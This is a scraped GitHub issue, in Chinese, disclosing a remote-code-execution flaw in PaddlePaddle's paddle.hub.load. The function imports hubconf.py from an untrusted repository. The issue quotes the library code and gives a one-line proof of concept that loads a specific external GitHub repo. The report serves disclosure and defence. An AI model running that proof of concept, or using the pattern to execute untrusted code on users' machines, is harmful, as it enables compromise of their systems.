We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
当用户使用 paddle.hub.load 函数加载外部模型时,调用链 load -> _import_module -> __import__ 最终会导致RC。
load函数:当用户调用 load 函数时,它会加载 hubconf 模块,因此只需在远程仓库中的 hubconf.py 文件中注入恶意代码,即可触发 RCE。
#源代码 def load( repo_dir: str, model: str, source: _Source = 'github', force_reload: bool = False, **kwargs: Any, ) -> paddle.nn.Layer: # Codes ..... if source in ('github', 'gitee'): repo_dir = _get_cache_or_reload( repo_dir, force_reload, True, source=source ) #MODULE_HUBCONF: str = 'hubconf.py' hub_module = _import_module(MODULE_HUBCONF.split('.')[0], repo_dir) _import_module def _import_module(name, repo_dir): sys.path.insert(0, repo_dir) try: hub_module = __import__(name) sys.modules.pop(name) except ImportError: sys.path.remove(repo_dir) raise RuntimeError( 'Please make sure config exists or repo error messages above fixed when importing' ) sys.path.remove(repo_dir) return hub_module
Poc 当用户从不受信任的外部来源加载内容时,直接调用 paddle.hub.load 可能会导致安全漏洞。
// PoC import paddle paddle.hub.load('JIRUWOZHI/test_padd:main', model='MM', source='github')
No response
The text was updated successfully, but these errors were encountered:
No branches or pull requests
bug描述 Describe the Bug
当用户使用 paddle.hub.load 函数加载外部模型时,调用链 load -> _import_module -> __import__ 最终会导致RC。
load函数:当用户调用 load 函数时,它会加载 hubconf 模块,因此只需在远程仓库中的 hubconf.py 文件中注入恶意代码,即可触发 RCE。
Poc 当用户从不受信任的外部来源加载内容时,直接调用 paddle.hub.load 可能会导致安全漏洞。
其他补充信息 Additional Supplementary Information
No response
The text was updated successfully, but these errors were encountered: